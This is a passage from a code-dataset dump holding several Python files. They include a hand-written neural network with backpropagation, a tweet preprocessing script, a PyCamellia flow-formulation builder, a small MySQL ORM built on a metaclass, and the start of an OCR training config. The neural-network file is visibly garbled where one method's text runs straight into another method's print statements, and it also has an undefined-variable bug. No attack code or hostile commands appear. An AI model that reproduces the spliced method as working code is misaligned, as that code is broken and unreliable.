successfully\n\t\tself.current_weights = NeuralNetwork.weights\n\t\tself.current_biases = NeuralNetwork.biases\t\n\n\t\tself.learning_rate = NeuralNetwork.learning_rate\n\n\t\tself.number_of_neurons = NeuralNetwork.number_of_neurons\n\t\tself.number_of_input = NeuralNetwork.number_of_input\n\t\tself.number_of_output = NeuralNetwork.number_of_output\n\t\treturn\n\n\t# NU.L2\n\n\tdef update_wb_regular_stochastic(self, input_set, Y0_set,\n\t\tweights, biases, AF,\t\t\n\t\tverbose=False,\n\t\tverbose_feed_forward=False,\n\t\tverbose_compute_diff=False,\n\t\tverbose_delta_L=False,\n\t\tverbose_compute_delta=False):\n\t\tif verbose>0: print(\" -+ update_wb_regular_stochastic().\")\n\t\t#----------------------------------------\n\t\t# weights : the collection of weights in the neural network\n\t\t# weights is a list [w_l], where w_l is the collection of weights between \n\t\t# the (l-1)-th and l-th layer\n\t\t# for l=2,3,...,L where l=1 is the input layer, l=2 the first hidden layer\n\t\t# and l=L is the output layer\n\t\t# w_l is a matrix (list of list)\n\t\t# so that w_l[i][j] is the weight between neuron j at layer l-1 and \n\t\t# neuron i at layer l \n\t\t# biases : the collection of biases in the neural network\n\t\t# biases is a list [b_l], where b_l is the collection of biases in the l-th layer\n\t\t# for l=2,3,...,L\n\t\t# input_set :list of numpy matrix [x]. Each x a column vector m x 1, m the number of neurons in input layer\n\t\t# Y0_set :list of numpy matrix over all data points\n\t\t# AF : activationFunction object\n\n\t\tn = len(input_set)\n\t\tL = len(weights) + 1\n\t\tbackprop_label = range(2,L+1)\n\t\tbackprop_label = [ backprop_label[-1-i] for i in range(len(backprop_label))]\n\t\t#-------------------------------------------------\n\t\t# for example if there are L=6 layers, this will be [6,5,4,3,2]\n\n\t\tcollection_a_l_set = [] # over all data points\n\t\tcollection_z_l_set = []\n\t\tfor j in range(n): # for each data points\n\t\t\ta_1 = input_set[j]\n\t\t\ta_l_set, z_l_set = self.feed_forward( weights, biases, a_1, AF,\n\t\t\t\t\t\t\tverbose=verbose_feed_forward,\n\t\t\t\t\t\t\tmatrix_formatting=\"%6.2f\")\n\t\t\tcollection_a_l_set.append(a_l_set)\n\t\t\tcollection_z_l_set.append(z_l_set) # collection of z_l_set over all data points\n\t\tY_set = [ a_l_set[-1] for a_l_set in collection_a_l_set]\n\n\t\tweights_next = [] # list [w_2,...,w_L] where each w_k is a list of list a matrix\n\t\tbiases_next = []\n\n\t\tfor i in range(len(backprop_label)): # for each layer\n\t\t\t# for regular_stochastic, at each l, compute average over data points\n\t\t\t# note that weights = [w_2,w_3,...,w_L] so the corresponding index [0,1,..,l-2,...,L-2]\n\t\t\tl = backprop_label[i]\n\t\t\tmax_i = len(backprop_label)-1\n\t\t\tif l == L:\n\t\t\t\tif verbose>10:\n\t\t\t\t\tprint(\" Layer (Output): \",backprop_label[i], \" || i = \", i,\"/\",max_i)\n\t\t\t\taverage_dterm_at_L, average_delta_at_L , CDLADP , CdLADP = self.compute_averaged_dterm_for_L(\n\t\t\t\t\tn, input_set, Y_set, Y0_set, AF,\n\t\t\t\t\tcollection_z_l_set, collection_a_l_set,\n\t\t\t\t\tverbose_delta_L=verbose_delta_L,\n\t\t\t\t\tverbose_compute_diff=verbose_compute_diff)\n\t\t\t\t# average_dterm_at_l (numpy matrix)\n\t\t\t\tCDlp1ADP = CDLADP\n\t\t\t\tCdlp1ADP = CdLADP\n\t\t\t\tw_l = np.matrix(weights[-1])\n\t\t\t\tw_l_next = w_l - self.learning_rate * average_dterm_at_L\n\t\t\t\tb_l = np.transpose(np.matrix(biases[-1]))\n\t\t\t\tb_l_next = b_l - self.learning_rate * average_delta_at_L\n\t\t\telse:\n\t\t\t\tif verbose>10:\n\t\t\t\t\tprint(\" Layer: \",backprop_label[i], \" || i = \", i,\"/\",max_i)\n\t\t\t\tw_l_plus_1 = weights[l-2 + 1]\n\t\t\t\taverage_dterm_at_l, average_delta_at_l , CDlADP , CdlADP = self.compute_averaged_dterm_for_other_l( \n\t\t\t\t\tl, n, w_l_plus_1, Cdlp1ADP, collection_a_l_set, collection_z_l_set, AF,\n\t\t\t\t\tverbose=False,\n\t\t\t\t\tverbose_compute_diff=verbose_compute_diff,\n\t\t\t\t\tverbose_compute_delta=verbose_compute_delta)\n\t\t\t\t# average_delta_at_l (numpy matrix)\n\t\t\t\tCDlp1ADP = CDlADP\n\t\t\t\tCdlp1ADP = CdlADP\n\t\t\n\t\t\t\tw_l = np.matrix(weights[-1 - i])\n\t\t\t\tw_l_next = w_l - self.learning_rate * average_dterm_at_l\n\t\t\t\tb_l = np.transpose(np.matrix(biases[-1-i]))\n\t\t\t\tb_l_next = b_l - self.learning_rate * average_delta_at_l\n\t\t\tweights_next.insert(0, ut.numpy_matrix_to_list(w_l_next))\n\t\t\tbiases_next.insert(0, ut.numpy_matrix_to_list(b_l_next))\n\n\t\treturn weights_next, biases_next\n\n\tdef compute_differential_term_at_l_per_data_point(self, delta_l, a_l_minus_1,\n\t\tverbose=False):\n\t\t# differential terms hre defined as delta^l times transpose of a^(l-1)\n\t\t# delta_l (numpy matrix): vector of size m x 1, where m is no of neurons at layer l\n\t\t# a_l_minus_1 (numpy matrix) x 1 vector, signals from layer l-1\n\t\tif verbose>0: print(\" -+ compute_differential_term_at_l().\")\n\t\tdterm = np.matmul(delta_l,np.transpose(a_l_minus_1))\n\t\t# dterm (numpy matrix)\n\t\treturn dterm\n\n\tdef compute_delta_l_per_data_point(self, w_l_plus_1, delta_l_plus_1, z_l, AF,\n\t\tverbose=False,\n\t\tprint_format=\"%6.8f\"):\n\t\tif verbose>0: print(\" -+ compute_differential_term_at_l().\")\n\t\t# recursive formula to compute d_l for all l except l=L\n\t\t#-----------------------------------------------\n\t\t# w_l_plus_1 (list): matrix of size m x n, weights between layer l and l+1\n\t\t# delta_l_plus_1 (numpy matrix): vector of size m x 1, where m is no of neurons at layer l+1\n\t\t# z_l (numpy matrix): vector of size m x 1, m no of neurons at layer m\n\t\t# this is w_l . a_l_minus_1 + b_l\n\t\t# return\n\t\t# delta_l (numpy matrix): vector of size m x 1, where m is no of neurons at layer l\n\t\tif verbose>5: \n\t\t\tprint(\" np.array(w_l_plus_1).shape = \",np.array(w_l_plus_1).shape)\n\t\ttemp = np.matmul(np.transpose(np.matrix(w_l_plus_1)),delta_l_plus_1)\n\t\ttemp2 = [AF.afp(z_l.item(i)) for i in range(len(z_l))]\n\t\tif not (len(temp)==len(temp2)):\n\t\t\tprint(\" -+ compute_delta_l(). Error, inconsistent dimensions. return None.\")\n\t\t\treturn None\n\t\tdelta_l = []\n\t\tfor i in range(len(temp)):\n\t\t\tdelta_l.append(temp.item(i)*temp2[i])\n\t\tdelta_l = np.transpose(np.matrix(delta_l))\n\t\tif verbose>10:\n\t\t\tprint(\" delta_l = \") \n\t\t\tut.print_numpy_matrix(delta_l,formatting=print_format,no_of_space=10)\n\t\treturn delta_l\n\n\tdef compute_delta_L_per_data_point(self, z_L, Y0, Y_set, Y0_set, AF,\n\t\tverbose=False,\n\t\tprint_format=\"%6.8f\"):\t\n\t\tif verbose>0: print(\" -+ compute_delta_L_per_data_point()\")\t\n\n\t\t# a single data point:\n\t\t# z_L (numpy matrix) is a vector: output data computed from NN before activation\n\t\t# Y0 (numpy matrix) is a vector: observed/true output data. \n\t\t# Still, we are minimizing MSE over the entire set of data points\n\t\t# Y_set and Y0_set are respectively the collection of NN-computed and true/observed data points\n\t\t#\n\t\t# Assume a_L and Y0 have the same size\n\t\t# Assume Y_set and Y0_set have the same size\n\t\t# Assume all entries of a_L and Y0 are real\n\t\t# AF (activationFunction). Assume it is initiated.\n\t\t# return\n\t\t# delta_L (numpy matrix)\n\t\t\n\t\tnabla_mse = nabla_MSE(Y_set,Y0_set) \n\t\t#-----------------------------------\n\t\t# (numpy matrix) a vector of size m, m the number of neurons in layer L\n\t\ttemp = [AF.afp(z_L.item(i)) for i in range(len(z_L))]\n\t\t#-----------------------------------\n\t\t# \n\n\t\tdelta_L = []\n\t\tif not (len(nabla_mse)==len(temp)):\n\t\t\traise ValueError(\" -+ compute_delta_L(). Error, inconsistent dimensions. Return None.\")\n\t\t\treturn None\n\t\tfor i in range(len(nabla_mse)):\n\t\t\tdelta_L.append(nabla_mse.item(i)*temp[i])\n\t\tdelta_L = np.transpose(np.matrix(delta_L))\n\t\tif verbose>10: \n\t\t\tprint(\" delta_L = \") \n\t\t\tut.print_numpy_matrix(delta_L,formatting=print_format,no_of_space=10)\n\t\treturn delta_L\n\n\t# NU.L3\n\n\tdef feed_forward(self, weights, biases, a_1, AF,\n\t\tverbose=False,\n\t\tmatrix_formatting=\"%6.2f\"):\n\t\tif verbose>0: print(\" --+ feed_forward()\")\n\t\t#----------------------------------------\n\t\t# weights : the collection of weights in the neural network\n\t\t# weights is a list [w_l], where w_l is the collection of weights between \n\t\t# the (l-1)-th and l-th layer\n\t\t# for l=2,3,...,L where l=1 is the input layer, l=2 the first hidden layer\n\t\t# and l=L is the output layer\n\t\t# w_l is a matrix (list of list)\n\t\t# so that w_l[i][j] is the weight between neuron j at layer l-1 and \n\t\t# neuron i at layer l \n\t\t# biases : the collection of biases in the neural network\n\t\t# biases is a list [b_l], where b_l is the collection of biases in the l-th layer\n\t\t# for l=2,3,...,L\n\t\t# a_1 : (numpy matrix) input layer \n\t\t# AF (activationFunction). Assume it is initiated.\n\n\t\t# matrix_print_raw_style (bool). If true, then matrix is printed as is\n\t\t# if false, then matrix is printed with padding.\n\n\t\t# return\n\t\t# a_l_set\n\t\t# (list) [a_l] for l = 1, 2, ..., L, [l=1 is input, l=L is output]\n\t\t# each a_l (numpy matrix) m x 1 vector, where m is no of neurons in layer l\n\t\t# z_l_set\n\t\t# (list) [z_l] for l = 1, 2, ..., L, [l=1 is input, l=L is output]\n\t\t# each z_l (numpy matrix) m x 1 vector, where m is no of neurons in layer l\n\t\t# \n\t\t# Note: each entry a_l[k] is just the corresponding entry z_l[k] with\n\t\t# activation function applied\n\t\t# Note: a_1 == z_1\n\n\t\ta_l_set = [a_1]\n\t\tz_l_set = [a_1]\n\t\tN_layer_minus_1 = len(weights)\n\t\tif not (N_layer_minus_1 == len(biases)):\n\t\t\tprint(\" Error.Dimension of weights and biases inconsistent.\")\n\t\tfor i in range(N_layer_minus_1):\n\t\t\ta_l_minus_1 = a_l_set[-1]\n\t\t\tw_l = np.matrix(weights[i])\n\t\t\tb_l = np.transpose(np.matrix(biases[i]))\n\t\t\tif verbose>20: \n\t\t\t\tprint(\" ------------------------------------\")\n\t\t\t\tprint(\" layer \",i, \"to layer\", i+1)\n\t\t\t\tprint(\" w_l = \" )\n\t\t\t\tut.print_numpy_matrix(w_l,formatting=matrix_formatting,no_of_space=20)\n\t\t\t\tprint(\" a_l_minus_1 = \")\n\t\t\t\tut.print_numpy_matrix(a_l_minus_1,formatting=matrix_formatting,no_of_space=20)\n\t\t\t\tprint(\" b_l = \")\n\t\t\t\tut.print_numpy_matrix(b_l,formatting=matrix_formatting,no_of_space=20)\n\t\t\tz_l = np.matmul(w_l,a_l_minus_1) + b_l\n\t\t\tz_l_set.append(z_l)\n\t\t\ta_l_act = []\n\t\t\tfor i in range(len(z_l)):\n\t\t\t\tif verbose>30 : print(\" -> \",i, \" : \", z_l.item(i), \" : \",AF.af(z_l.item(i)))\n\t\t\t\ta_l_act.append(AF.af(z_l.item(i)))\n\t\t\ta_l_act = np.transpose(np.matrix(a_l_act))\t\n\t\t\tif verbose>20 : \n\t\t\t\tprint(\" a_l_act = \") \n\t\t\t\tut.print_numpy_matrix(a_l_act,formatting=matrix_formatting,no_of_space=20)\n\t\t\ta_l_set.append(a_l_act)\n\t\t\t\n\t\treturn a_l_set, z_l_set\n\n\t# NU.L4\n\n\tdef compute_z_j_at_layer_l(self, a_l_minus_1, w_l, b_l, \n\t\tverbose=False):\n\t\tif verbose>0: print(\" ---+ compute_z_j_at_layer_l().\")\n\t\t# w_L (numpy matrix) is a matrix, weights between layers L-1 and L\n\t\t# b_L (numpy matrix) is a vector, biases at layer L\n\t\t# a_L_minus_1 (numpy matrix) is a vector, signal from layer L-1\n\t\tz_j_at_layer_l = np.matmul(w_l,a_l_minus_1) + b_L\n\t\treturn z_j_at_layer_l\n\n\tdef compute_averaged_dterm_for_other_l(self, l, n, w_l_plus_1, Cdlp1ADP, \n\t\tcollection_a_l_set, collection_z_l_set, AF,\n\t\tverbose=False,\n\t\tverbose_compute_diff=False,\n\t\tverbose_compute_delta=False):\n\n\t\t# dterm is just a convenient name for update terms for w. Effectively this\n\t\t# function computes the update term for l as well.\n\n\t\t# l (int): for update in layer l print_neural_network_verbose_information().\")\n\t\tprint(\" Current weights size = \", len(self.current_weights) ) # (list, not in numpy matrix)\n\t\tprint(\" Current biases size = \", len(self.current_biases) ) # (list)\n\t\tprint(\" learning_rate = \",self.learning_rate )# (float)\n\t\tprint(\" number_of_neurons = \",self.number_of_neurons ) # list [N1,N2,...,NL]\n\t\tprint(\" number_of_input (no of neurons in input layer) = \",self.number_of_input ) # number_of_neurons[0]\n\t\tprint(\" number_of_output (no of neurons in output layer) = \",self.number_of_output) # number_of_neurons[-1]\n\t\tprint(\" size of input_set = \",len(self.input_set) )\n\t\tprint(\" size of Y0_set = \",len(self.Y0_set) )\n\t\tprint(\" method = \",self.method )\n\t\tprint(\" method_specific_settings = \",self.method_specific_settings) # (dictionary)\n\t\treturn\n\t\t\n\nclass activationFunction:\n\tdef __init__(self, func = \"Sigmoid\"):\n\t\tself.af = None # activation function\n\t\tself.afp = None # first derivative of activation function, p for prime\n\t\tself.select_activation_function(func)\n\t\treturn\n\n\tdef select_activation_function(self, func):\n\t\tif func == \"Sigmoid\":\n\t\t\tself.af = lambda x: 1/(1+np.exp(-x))\n\t\t\tself.afp = lambda x: 1/(1+np.exp(-x)) * (1- 1/(1+np.exp(-x)))\n\t\telse:\n\t\t\t# In any other exceptional cases, set to Sigmoid function\n\t\t\tself.af = lambda x: 1/(1+np.exp(-x))\n\t\t\tself.afp = lambda x: 1/(1+np.exp(-x)) * (1- 1/(1+np.exp(-x)))\n\t\treturn\n\n\n# Static functions\ndef MSE(Y_set,Y0_set):\n\t# Y_set is a list of Y\n\t# Y0_set is a list of Y0\n\t# Assume Y_set and Y0_set have the same size, otherwise error will be raised\n\t#\n\t# Y (numpy matrix) is a vector: computed data from model\n\t# Y0 (numpy matrix) is a vector: observed/true data\n\t# Assume Y and Y0 have the same size, otherwise error will be raised\n\t# Assume all entries are real\n\t\n\tmse = 0\n\tn = len(Y_set)\n\tif not (n==len(Y0_set)):\n\t\tprint(\"MSE(). Error. Inconsistent dimension between Y_set and Y_set0. Return nothing.\")\n\t\treturn\t\n\tfor i in range(n):\n\t\tY = Y_set[i]\n\t\tY0 = Y0_set[i]\n\t\tNout1 = len(Y.tolist())\n\t\tNout2 = len(Y0.tolist())\n\t\tif not (Nout1==Nout2):\n\t\t\tprint(\"MSE(). Error. Inconsistent dimension between Y and Y0. Return nothing.\")\n\t\t\treturn\n\t\t# now compute the norms between true and model output values\n\t\tfor j in range(Nout1):\n\t\t\tmse = mse + (np.abs(Y0.item(j)-Y.item(j)))**2\n\tmse = mse / (2*n)\n\n\treturn mse\n\ndef nabla_MSE(Y_set,Y0_set):\n\t# Y_set is a list of Y\n\t# Y0_set is a list of Y0\n\t# Assume Y_set and Y0_set have the same size, otherwise error will be raised\n\t#\n\t# gradient of MSE wrt a_L\n\t# Y (numpy matrix) is a column vector: computed output from model\n\t# Y0 (numpy matrix) is a column vector: observed/true data\n\t# Assume Y and Y0 have the same size, otherwise error will be raised\n\t# Assume all entries are real\n\tn = len(Y_set)\n\tif not (n==len(Y0_set)):\t\n\t\tprint(\" >> Y_set size = \",len(Y_set))\n\t\tprint(\" >> Y0_set size = \",len(Y0_set))\n\t\traise ValueError(\"nabla_MSE(). Error. Inconsistent dimension between Y_set and Y_set0. Return nothing.\")\n\t\treturn\n\tnabla_mse = None\n\tfor i in range(n):\n\t\tY = Y_set[i] # numpy matrix\n\t\tY0 = Y0_set[i]\n\t\tif i == 0 :\n\t\t\tnabla_mse = Y-Y0\n\t\telse:\n\t\t\tnabla_mse = nabla_mse + Y-Y0\n\tnabla_mse = nabla_mse/n \n\treturn nabla_mse","sub_path":"kero/multib/NeuralNetwork.py","file_name":"NeuralNetwork.py","file_ext":"py","file_size_in_byte":30258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"27580231","text":"'''Preprocessing of the raw data extracted from the Trump Twitter Archive (all tweets from 2018 downloaded as json).'''\n\nimport json\nimport re # This module is used to convert strings into words lists\nimport nltk # Natural Language Processing module\nfrom nltk.corpus import stopwords # Stopwords. Use nltk.download('stopwords') if\n # the dictionary was not previously downloaded\n\n# Different stemming modules\nfrom nltk.stem import PorterStemmer\nfrom nltk.stem.snowball import SnowballStemmer\nfrom stemming.porter2 import stem\n\n# Parameters:\nrm_stopwords = True # Set to True to remove stopwords and digits\nstemming = True # Set to True to stem words\nall_lowercase = True # Set to True to make all words lowercase\nN = None # Number of raw tweets to consider. Set to None to use all of them.\n\n#--------------------------------------------------------\n# Read raw data\n#--------------------------------------------------------\nprint(\"---------- Reading data... ----------\")\nwith open('data/raw_Trump_2018_tweets.json') as json_data_file:\n data = json.load(json_data_file) # This is a list of dictionaries\nif not N:\n N = len(data)\nprint(\"%d tweets successfully read\" % N)\n\n# Create a list of sub-lists. Each of the sub-lists contains all the words from a tweet,\n# with no punctuation signs. The chronological order of tweets is respected.\ntweets = []\nfor i in range(0,N):\n # Substitute symbols (@,#,&,$) by '0' in order to remove hashtags, usernames and\n # other text that is not a word per se. Then we will eliminate any string containing\n # a number. Example: we transform @POTUS into 0POTUS and we will remove it later.\n data[i]['text'] = re.sub(\"@\",\"0\",data[i]['text'])\n data[i]['text'] = re.sub(\"#\",\"0\",data[i]['text'])\n data[i]['text'] = re.sub(\"&\",\"0\",data[i]['text'])\n data[i]['text'] = re.sub(\"$\",\"0\",data[i]['text'])\n data[i]['text'] = re.sub(\"/\",\"0\",data[i]['text'])\n data[i]['text'] = re.sub(\"\\\\\\\\\",\"0\",data[i]['text'])\n\n tweets.append(re.sub(\"[^\\w]\", \" \", data[i]['text']).split()) # [ ]=set, ^=not in, \\w=a-z0-9A-Z\n\n#--------------------------------------------------------\n# Remove stopwords and digits\n#--------------------------------------------------------\nif rm_stopwords:\n # First, we include 'amp' in the stopwords. This appears in substitution of &.\n # We also include 'rt', which is used as indicator of retweet.\n # We also include 'https', which is used for URLs\n # Remove single letter words and digits too.\n my_stopwords = stopwords.words('english') + ['amp'] + ['rt'] + ['https']\n\n clean_tweets = []\n if all_lowercase:\n print(\"---------- Removing stopwords (and digits) and lowercasing... ----------\")\n for i in range(0,N):\n clean_tweets.append([word.lower() for word in tweets[i] if((word.lower() not in my_stopwords) and (not any(character.isdigit() for character in word)) and (len(word) > 1) )])\n else:\n print(\"---------- Removing stopwords (and digits)... ----------\")\n for i in range(0,N):\n clean_tweets.append([word for word in tweets[i] if((word.lower() not in my_stopwords) and (not any(character.isdigit() for character in word)) and (len(word) > 1) )])\n\nelse:\n print(\"---------- NOT removing stopwords (and digits)... ----------\")\n\n#--------------------------------------------------------\n# Stemming\n#--------------------------------------------------------\n# Uncomment the following lines to test different stemming algorithms:\n'''words = clean_tweets[0]\n\n# Porter works poorly on some words, e.g.: foolishly:foolishli, nothing:noth, little:littl\nfor word in words:\n print(word + \":\" + PorterStemmer().stem(word))\n\n# Snowball works poorly on some words, e.g.: nothing:noth, little:littl\nfor word in words:\n print(word + \":\" + SnowballStemmer(\"english\").stem(word))\n\n# Porter2 gives similar results to Snowball\nfor word in words:\n print(word + \":\" + stem(word))'''\n\nif stemming:\n print(\"---------- Stemming words... ----------\")\n # We will use Porter2:\n for i in range(0,N): # Loop over all clean_tweets\n j = 0\n for word in clean_tweets[i]:\n clean_tweets[i][j] = stem(word)\n j += 1\nelse:\n print(\"---------- NO STEMMING ----------\")\n\n#--------------------------------------------------------\n# Delete empty tweets\n#--------------------------------------------------------\nsifted_tweets = []\nfor tweet in clean_tweets:\n if tweet:\n sifted_tweets.append(tweet)\nprint('%s tweets left after preprocessing'%len(sifted_tweets))\n\n#--------------------------------------------------------\n# Save data\n#--------------------------------------------------------\nprint(\"---------- Saving sifted tweets... ----------\")\nwith open('data/clean_Trump_2018_tweets.json', 'w') as outfile:\n json.dump(sifted_tweets, outfile)\n","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":4857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"146256083","text":"from PyCamellia import *\nfrom string import *\nimport os\n\n#takes the inputs from the GUI and returns a formulation with all conditions attached\nclass FormCreator():\n def __init__(self):\n pass\n #@return\n #poly - an integer between 1 and 9\n #inflows - an array of spacial filters\n #x_vels - an array of Functions for the x velocities mapping to inflows of the same array index\n #y_vels - an array of Functions for the y velocities mapping to inflows of the same array index\n #outflows - an array of spacial filters\n #dims - the dimensions of the mesh; a list of doubles of length 2\n #elems - a list of ints; the elements in the mesh\n #re - renolds number, a double, optional argument\n #transient - Boolean, whether or not the function is transient\n def main(self, poly, inflows, x_vels, y_vels, outflows, dims, elems, re=None, transient=False):\n delta_k = 1 \n space_dim = 2\n mesh = self.makeMesh(dims, elems)\n\n #for Navier\n if re != None:\n form = NavierStokesVGPFormulation(mesh, re, poly, delta_k)\n \n #for Stokes\n else:\n #self.context.setNav(False)\n use_conforming_traces = True\n mu = 1.0\n form = StokesVGPFormulation(space_dim, use_conforming_traces, mu, transient)\n form.initializeSolution(mesh, poly, delta_k)\n \n form.addZeroMeanPressureCondition()\n\n #adding conditions\n inflow = self.add_inflow_conditions(form, transient, inflows, x_vels, y_vels)\n outflow = self.add_outflow_conditions(form, outflows)\n #self.add_conditions(\"wall\", form, transient)\n form.addWallCondition(self.implicit_walls(dims, inflow, outflow))\n \n \n return form\n\n \n\n\n \n #if not loading from a file make a new mesh Topology\n #if not self.context.loaded:\n def makeMesh(self, dims, elems):\n x0 = [0., 0.]\n return MeshFactory.rectilinearMeshTopology(dims, elems, x0)\n \n\n\n \n\n\n #adds wall/inflow/outflow conditions to the form\n def add_inflow_conditions(self, form, transient, inflows, x_vels, y_vels):\n total_boundary = SpatialFilter.negatedFilter(SpatialFilter.allSpace())\n for x in range(0, inflows.__len__()):\n velocity = self.get_velocity(transient, form, x_vels[x], y_vels[x])\n form.addInflowCondition(inflows[x], velocity)\n total_boundary = SpatialFilter.unionFilter(total_boundary, inflows[x])\n return total_boundary\n\n #adds wall/inflow/outflow conditions to the form\n def add_outflow_conditions(self, form, outflows):\n total_boundary = SpatialFilter.negatedFilter(SpatialFilter.allSpace())\n for boundary in outflows:\n form.addOutflowCondition(boundary)\n total_boundary = SpatialFilter.unionFilter(total_boundary, boundary)\n return total_boundary\n\n #adds wall conditions on all part of perameter that is not an inflow or outflow\n def implicit_walls(self, dimensions, inflow, outflow):\n flows = SpatialFilter.unionFilter(inflow, outflow)\n wallConditions = SpatialFilter.negatedFilter(flows)\n return wallConditions\n\n #prototype\n def get_velocity(self, transient, form, x_vel, y_vel):\n topVelocity = Function.vectorize(x_vel, y_vel)\n if transient:\n timeRamp = TimeRamp.timeRamp(form.getTimeFunction(),1.0)\n topVelocity = topVelocity*timeRamp\n return topVelocity\n \n \n #takes a string and returns a spacial filter\n #unused for phase 3\n def get_space_fil(self, prompt):\n answer = self.context.query(prompt)\n altered = answer.lower()\n altered = altered.translate(None, whitespace)#remove whitespace\n try:\n \tif altered.find(\",\") > -1: #if there are multiple spacial filters\n \t halves = altered.split(\",\")#split them\n \t filter1 = self.get_space_fil_helper(halves[0],prompt)\n \t filter2 = self.get_space_fil_helper(halves[1],prompt)\n \t return SpatialFilter.intersectionFilter(filter1, filter2)\n \telse:\n \t\treturn self.get_space_fil_helper(altered, prompt)\n except ValueError:\n \tself.context.parse_error(answer)\n \tself.get_space_fil(prompt)\n\n\n #space_fil's helper method\n def get_space_fil_helper(self, assignment, prompt):\n is_x = assignment.find(\"x\") > -1\n if not is_x:\n if assignment.find(\"y\") == -1:\n self.context.parse_error(assignment)\n return self.get_space_fil(prompt)\n #error here\n if assignment.find(\"=\") > -1:\n if is_x:\n return SpatialFilter.matchingX(float(assignment.translate(None, \"x=\")))\n else:\n return SpatialFilter.matchingY(float(assignment.translate(None, \"y=\")))\n elif assignment.find(\">\") > -1:\n if is_x:\n return SpatialFilter.greaterThanX(float(assignment.translate(None, \"x>\")))\n else:\n return SpatialFilter.greaterThanY(float(assignment.translate(None, \"y>\")))\n elif assignment.find(\"<\") > -1:\n if is_x:\n return SpatialFilter.lessThanX(float(assignment.translate(None, \"x<\")))\n else:\n return SpatialFilter.lessThanY(float(assignment.translate(None, \"y<\")))\n else:\n self.context.parse_error(assignment)\n answer = self.context.query(\"Please input spatial filter in form x=3, y< 4\")\n return self.get_space_fil_helper(answer, prompt)\n","sub_path":"program/FormCreator.py","file_name":"FormCreator.py","file_ext":"py","file_size_in_byte":5615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"60903768","text":"# Author:Cecilia\n\nfrom orm import mysql_contorl\n\n\n\n# 字段类,所有字段类的父类\nclass Fields:\n def __init__(self,name,column_type,primary_key,default):\n self.name = name\n self.column_type = column_type\n self.primary_key = primary_key\n self.default = default\n\n\n# 整型字段类\nclass Integer(Fields):\n def __init__(self,name,column_type='int',primary_key=False,default=0):\n super().__init__(name,column_type,primary_key,default)\n\n\n# 字符型数据类\nclass String(Fields):\n def __init__(self, name, column_type='varchar(250)', primary_key=False, default=None):\n super().__init__(name, column_type, primary_key, default)\n\n\n\n\n\n\n# 元类,控制表类对象的产生\nclass MyMetaclass(type):\n def __new__(cls, class_name,class_base,class_attr):\n if class_name == 'Models':\n return type.__new__(cls, class_name,class_base,class_attr)\n\n table_name = class_attr.get('table_name',class_name)\n mappings = {}\n primary_key = None\n\n for k,v in class_attr.items():\n if isinstance(v,Fields):\n mappings[k] = v\n if v.primary_key:\n if primary_key:\n raise TypeError('一个表只能有一个主键 !')\n else:\n primary_key = v.name\n\n if not primary_key:\n raise TypeError('一个表必须有一个主键 !')\n\n for k in mappings.keys():\n class_attr.pop(k)\n\n class_attr['table_name'] = table_name\n class_attr['primary_key'] = primary_key\n class_attr['mappings'] = mappings\n return type.__new__(cls, class_name, class_base, class_attr)\n\n\n\n# 所有表类的父类,通过继承字典实现字典可以用点取值赋值\nclass Models(dict,metaclass=MyMetaclass):\n def __init__(self,**kwargs):\n super().__init__(**kwargs)\n\n\n #字典点赋值时触发\n def __setattr__(self, key, value):\n self[key] = value\n\n # 字典点取值时触发\n def __getattr__(self, item):\n return self.get(item)\n\n\n\n # 类的绑定方法,类可以不用传第一个参数可以直接用,对象也可以不用传第一个参数用\n @classmethod\n def select(cls,**kwargs):\n mysql_obj = mysql_contorl.MySQL()\n if not kwargs:\n sql = 'select * from %s' %cls.table_name\n res = mysql_obj.select(sql)\n else:\n key = list(kwargs.keys())[0]\n value = kwargs.get(key)\n sql = 'select * from %s where %s=?'%(cls.table_name,key)\n sql = sql.replace('?','%s')\n res = mysql_obj.select(sql,value)\n return [cls(**r) for r in res]\n\n\n # 向数据库中插入数据\n def save(self):\n mysql_obj = mysql_contorl.MySQL()\n\n # insert into table() values()\n\n keys=[]\n values=[]\n replace = []\n for k,v in self.mappings.items():\n keys.append(k)\n values.append(getattr(self,v.name,v.default))\n replace.append('?')\n\n sql = 'insert into %s(%s) values(%s)'%(self.table_name,','.join(keys),','.join(replace))\n sql = sql.replace('?','%s')\n mysql_obj.execute(sql,values)\n\n\n # 修改数据库中的数据\n def sql_update(self):\n mysql_obj = mysql_contorl.MySQL()\n\n keys = []\n primary_key = None\n values = []\n for k,v in self.mappings.items():\n if v.primary_key:\n primary_key = getattr(self,v.name,v.default)\n else:\n keys.append(v.name+'=?')\n values.append(getattr(self,v.name,v.default))\n\n sql = 'update %s set %s where %s=%s' %(self.table_name,','.join(keys),self.primary_key,primary_key)\n sql = sql.replace('?','%s')\n mysql_obj.execute(sql,values)\n\n\n\n\n","sub_path":"youku_server/orm/orm_demo.py","file_name":"orm_demo.py","file_ext":"py","file_size_in_byte":3859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"126571277","text":"from tool.config import Cfg\nfrom model.trainer import Trainer\nimport os\nos.environ['CUDA_VISIBLE_DEVICES'] = '0'\n\n\ndef main(model_name, checkpoint_name, url):\n config = Cfg.load_config_from_name(model_name)\n dataset_params = {\n 'name': 'hw',\n 'data_root': '/home/longhn',\n # 'train_root': '/home/fdm/Desktop/chungnph/vietocr/Annotation_2505',\n # 'val_root': '/home/fdm/Desktop/chungnph/vietocr/Annotation_2505',\n 'train_annotation': f'{url}/train.txt',\n 'valid_annotation': f'{url}/valid.txt'\n }\n\n params = {\n 'print_every': 200,\n 'valid_every': 10*200,\n 'iters': 30000,\n 'checkpoint': f'./checkpoint/{checkpoint_name}.pth',\n 'export': f'./checkpoint/{checkpoint_name}.pth',\n 'metrics': 15000,\n 'batch_size': 32\n }\n dataloader_params = {\n 'num_workers': 1\n }\n # config['pretrain']['cached'] = 'checkpoint/ngaycap_0204.pth'\n config['trainer'].update(params)\n config['dataset'].update(dataset_params)\n config['dataloader'].update(dataloader_params)\n config['device'] = 'cuda'\n config['vocab'] = 